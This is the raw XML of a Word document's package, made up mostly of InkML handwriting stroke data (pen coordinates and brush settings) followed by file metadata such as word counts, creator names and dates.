  <inkml:trace contextRef="#ctx0" brushRef="#br0">68150 1.2814e+06 493,'46'-2'0,"-5"-3"0,-7-3 0,-5-2 0,0-3 2,10 1 0,10-1-1,9 1-2,4 4 1,1 9 1,-1 10-2,1 10 0,7 13 2,16 19-5,15 19 5,17 19-1,16 13-1,19 10-3,19 10 6,19 9-2,15-4-2,13-15 3,12-15-2,13-16 1,2-13 0,-5-9 1,-7-10-4,-5-8 6,-4-12-7,0-12 3,0-13 0,0-12 2,-24-5 2,-46 3 2,-47 3-6,-47 4 2,-22-3-4,3-5 1,3-7 3,4-5-3</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203055366873741" units="cm"/>
      <inkml:brushProperty name="height" value="0.0203055366873741" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">61550 1.2732e+06 481,'0'-49'0,"0"4"-1,0 3 1,0 3 1,1-7-2,4-15 3,3-15-4,3-16 3,-1 1-1,-2 19 2,-3 19-2,-3 19-1,-1 7 1,4-3 0,3-3 0,3-2-1,1 0 3,1 7-3,-1 6 1,1 7 1,-3 5-1,-2 7 1,-3 6 0,-3 7-1,-1 10-3,4 16 1,3 15 2,3 17 0,1 3-1,1-5 0,-1-7 1,1-5 0,-3 14 3,-2 39-1,-3 36-2,-3 39 0,-1 0-2,4-33-1,3-35 4,3-34-1,-1 12 0,-2 59 3,-3 60-4,-3 60 2,-4 7-3,-3-44 1,-3-43 2,-2-44-1,-6 23 1,-6 91-1,-6 90 1,-6 92-1,-2 2-2,3-84 3,3-85-2,4-83 1,-1-4 1,-3 78-1,-3 78-1,-2 79 3,0-6-4,7-86 3,6-89-2,7-86 1,4-28 1,3 35 0,3 35-1,4 34-1,1-4 2,0-40-5,0-40 6,0-41-2,0-8 0,0 25 1,0 25-1,0 25 1,0-7-4,0-36 5,0-39-3,0-36 1,3-14 1,6 14-2,7 11 3,6 14-4,4 0 1,4-8 0,3-10 0,3-9 2,-1-13-3,-2-16 4,-3-15-3,-3-15 1,-4-11 4,-3-2 0,-3-3-2,-2-3-4,0-12-2,7-18 0,6-19 3,7-18 3,-1-3 1,-6 17 2,-6 15-4,-6 16-1,-4 7-5,1 1 4,-1-1-1,1 1 2</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink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203904565423727" units="cm"/>
      <inkml:brushProperty name="height" value="0.0203904565423727" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">67000 1.2735e+06 479,'0'-49'0,"0"4"0,0 3 1,0 3-3,0 1 6,0 1-3,0-1-2,0 1 3,1 2-5,4 7 2,3 6 2,3 7-2,6 2-1,9 1 3,10-1-3,10 1 4,0-1-5,-5 1 4,-7-1-3,-5 1 4,17-10 0,45-19 0,43-18-1,45-19-2,17-8 0,-5 3-3,-7 3 5,-5 4 0,-19 7-2,-27 13 2,-28 12-1,-28 13 0,-1 6 1,29 0-1,28 0-1,28 0 2,-2 1 0,-31 4-4,-31 3 5,-31 3-2,-2 3 0,28 3-1,28 3 2,29 4-1,-3 1 1,-30 0-4,-32 0 6,-30 0-4,-12 0 0,9 0 3,10 0-2,10 0-2,-3 0 4,-11 0-3,-14 0 0,-11 0 2,-6 3-1,4 6 0,3 7 1,3 6-1,1 4-1,1 4 2,-1 3-2,1 3 2,-3 3-2,-2 3 3,-3 3-4,-3 4 4,-4 8-3,-3 17-1,-3 15 3,-2 16-2,-5 10 3,-2 7-4,-3 6 3,-3 7-1,-7 5-2,-9 7 3,-10 6-2,-8 7 1,-9 10 2,-6 16-5,-6 15 6,-6 17-4,-1 5 1,7-3 0,6-3 0,7-2 0,5-22 0,7-36 2,6-39-3,7-36 1,-1-11 1,-6 20-3,-6 18 2,-6 20 1,1-3 0,9-21-2,10-22 1,10-22 1,-1-1-1,-9 23-3,-10 22 5,-8 22-3,-1-2 3,9-25-3,10-25 3,10-25-3,-1-5 0,-9 16 1,-10 15-2,-8 17 4,-3-3-2,7-18 1,6-19 0,7-18-2,-1-15 0,-6-9 2,-6-10-1,-6-8-1,-1-6 2,7 1-3,6-1 2,7 1 2,0-6-4,-2-8 2,-3-10 0,-3-9 1,-1-2-1,4 6 1,3 7-2,3 6 1,-4-7 1,-8-18-4,-10-19 4,-9-18-2,-10-17 2,-9-11-4,-10-14 5,-8-11-4,-9-6 1,-6 4-2,-6 3 3,-6 3 1,2 10 5,14 20 1,11 18-5,14 20-3,7 13-1,3 9 1,3 10 1,4 10-1</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink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5379280783236" units="cm"/>
      <inkml:brushProperty name="height" value="0.015379280783236" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">47500 1.27425e+06 635,'0'23'-1,"0"-3"1,0-3-2,0-2 4,0-3-2,0 1 4,0-1-6,0 1 2,0 5 3,0 14-3,0 11 2,0 14-5,0 2 3,0-6-6,0-6 7,0-6-1,0 13 3,0 35-1,0 35-2,0 34 1,0 4-6,0-24 3,0-26 3,0-24-4,-7 21 9,-11 69-3,-14 69-5,-11 69 3,-4 26-3,6-16-2,7-15 5,6-15-2,4-37 1,4-56 0,3-56 0,3-56-1,3-18 4,3 22-2,3 22 1,4 23-4,1-3 1,0-24 0,0-26-1,0-24 3,3-15 0,6-3 2,7-3-4,6-2 2,6-12-9,6-19 5,7-18 2,6-19 0,-2-8 12,-9 3-2,-10 3-8,-8 4-3,-3-12-1,7-24-1,6-26 3,7-24 1,-1-4 2,-6 19 0,-6 19-2,-6 19-1,-2 2 2,3-11-2,3-14 2,4-11-2,-1-1 0,-3 13 1,-3 12 0,-2 13-1</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink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57531313598156" units="cm"/>
      <inkml:brushProperty name="height" value="0.0157531313598156" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">47600 1.2736e+06 620,'-47'0'0,"6"0"0,7 0 0,6 0 0,3 0-2,0 0 0,0 0 2,0 0-1,1 0 8,4 0-4,3 0-2,3 0-1,4 0-1,7 0 1,6 0 1,7 0-2,8 1-4,14 4 3,11 3-1,14 3 5,2-1-1,-6-2-2,-6-3 2,-6-3 0,5-2-1,20 0 0,18 0 1,20 0-1,0 0 0,-15 0-1,-15 0 2,-16 0-1,6-4 0,28-5-1,28-7 1,29-5 0,1-3 2,-25 4-5,-25 3 6,-25 3-5,1-4 2,29-8-1,28-10 2,28-9-3,-1-1 6,-27 10-4,-28 10 2,-28 9-4,1 1 1,31-6-1,32-6 3,31-6-1,6 2 0,-19 14 3,-18 11-4,-19 14 1,-21 5 0,-21 1 0,-22-1-1,-22 1 2,-10 4-3,4 9 4,3 10-4,3 10 3,-2 0 0,-6-5-2,-6-7 2,-6-5-2,-6 3 3,-2 17-1,-3 15-4,-3 16 6,-2 1-5,0-12-1,0-13 3,0-12 2,-7 9-2,-11 31 1,-14 32 1,-11 31-4,-4 3 1,6-25-1,7-25 3,6-25-1,-7 10 0,-18 48 2,-19 47-2,-18 47 1,-3 1-4,17-44 2,15-43 2,16-44-2,-1-4 3,-15 39-2,-15 36 0,-16 39 0,1-1 0,19-37-1,19-38 3,19-37-5,4-4 5,-9 32-6,-10 31 7,-8 32-5,0-6 5,14-40-2,11-40-1,14-41-1,2-18-1,-6 7-3,-6 6 5,-6 7 0,-1-4 6,7-12 0,6-13-7,7-12 2,-1-7-8,-6 1 1,-6-1 6,-6 1 1,-1-3 5,7-2 2,6-3-8,7-3 1,0-6-7,-2-5 2,-3-7 5,-3-5-1,-2-4 1,0 0 2,0 0-2,0 0-1</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink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44578740000725" units="cm"/>
      <inkml:brushProperty name="height" value="0.0144578740000725" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">53900 1.2755e+06 676,'-71'-47'-2,"10"6"0,10 7 2,9 6 1,13 4 4,20 4 4,18 3-11,20 3 4,17 4-8,20 7 3,18 6 3,20 7 0,16 2-3,16 1 2,15-1 0,17 1 2,7-3-2,0-2 3,0-3-3,0-3 1,-15-4-1,-27-3 1,-28-3 0,-28-2-1,2-6 5,35-6-3,35-6-2,34-6 3,-1-2-5,-33 3 2,-35 3-1,-34 4 3,-2-4-1,31-9 1,32-10-1,31-8 0,-2-3 1,-34 7 3,-35 6-7,-33 7 6,-8-4-7,23-12 4,22-13-1,22-12 2,-2 1 0,-25 16 1,-25 15-2,-25 17 1,-10 3-6,7-5 3,6-7 1,7-5 2,-4 2-1,-12 13 2,-13 12-3,-12 13 2,-10 6 3,-6 0 0,-6 0-4,-6 0 0</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink8.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8898032605648" units="cm"/>
      <inkml:brushProperty name="height" value="0.018898032605648" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">60600 1.275e+06 517,'-52'23'-1,"-3"-3"0,-3-3 1,-2-2 0,-5-5 2,-2-2 1,-3-3-2,-3-3-2,-2-4 0,0-3 3,0-3-4,0-2 4,3-1-5,6 3 2,7 3 1,6 4 1,6 1-2,6 0 4,7 0-4,6 0 0,13 1 2,23 4-4,22 3 4,22 3-2,5 1 0,-8 1 0,-10-1 1,-9 1-1,2-4 5,17-6-4,15-6 2,16-6-4,1-4 3,-12 1-5,-13-1 4,-12 1 2,4-6-3,22-8 5,22-10-6,23-9 3,17-5-2,17 0 0,15 0 1,16 0 1,-7 3-2,-28 6 1,-28 7 0,-27 6 1,-1 1-3,28-3 3,28-3 0,29-2-3,16-3 3,7 1-2,6-1 0,7 1 2,-20 2 0,-43 7-1,-44 6 0,-43 7 1,-18 2-2,9 1 2,10-1-2,10 1 2,-3 1-3,-11 3 1,-14 3 0,-11 4 1,-17 4 3,-18 6-3,-19 7 2,-18 6-4,-7-1 5,6-5 0,7-7-3,6-5-1,-5 0-1,-16 10-3,-15 10 6,-15 9-1,-4 2 2,9-2-2,10-3 2,10-3-4</inkml:trace>
</inkml:ink>
</file>

<file path=word/ink/ink9.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1-12-07T16:33:45"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.0171918943524361" units="cm"/>
      <inkml:brushProperty name="height" value="0.0171918943524361" units="cm"/>
      <inkml:brushProperty name="color" value="#000000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
      <inkml:brushProperty name="ignorePressure" value="0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">66850 1.27365e+06 568,'0'-24'0,"0"4"0,0 3 0,0 3 0,1 3 5,4 3 1,3 3-7,3 4 1,1 7-7,1 13 0,-1 12 6,1 13 3,-3 2-3,-2-5 0,-3-7 2,-3-5-1,-2 13 2,0 34 0,0 35-1,0 35-1,1 5-2,4-21 2,3-22 0,3-22 0,-1 12 1,-2 47 0,-3 47-1,-3 48 0,-2-1-1,0-47-1,0-47 4,0-46-4,0 2 4,0 54-1,0 53-1,0 53-1,0 6-1,0-41-5,0-40 8,0-40-2,0-34 8,0-24-3,0-26-5,0-24 2,3-15-5,6-3 0,7-3 5,6-2-3,-1-6 9,-5-6-2,-7-6-6,-5-6 2,-3-7-3,4-6-1,3-6 4,3-6-1,-1-4-1,-2 1 1,-3-1 1,-3 1-3</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233</Words>
  <Characters>1332</Characters>
  <Lines>11</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1562</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2018-11-13T10:09:00Z</dcterms:created>
  <dc:creator>z jy</dc:creator>
  <cp:lastModifiedBy>16062</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-07T08:54:09Z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A07227F15701427F84E3C6EFB02C3CFB</vt:lpwstr>
  </property>
</Properties>
</file>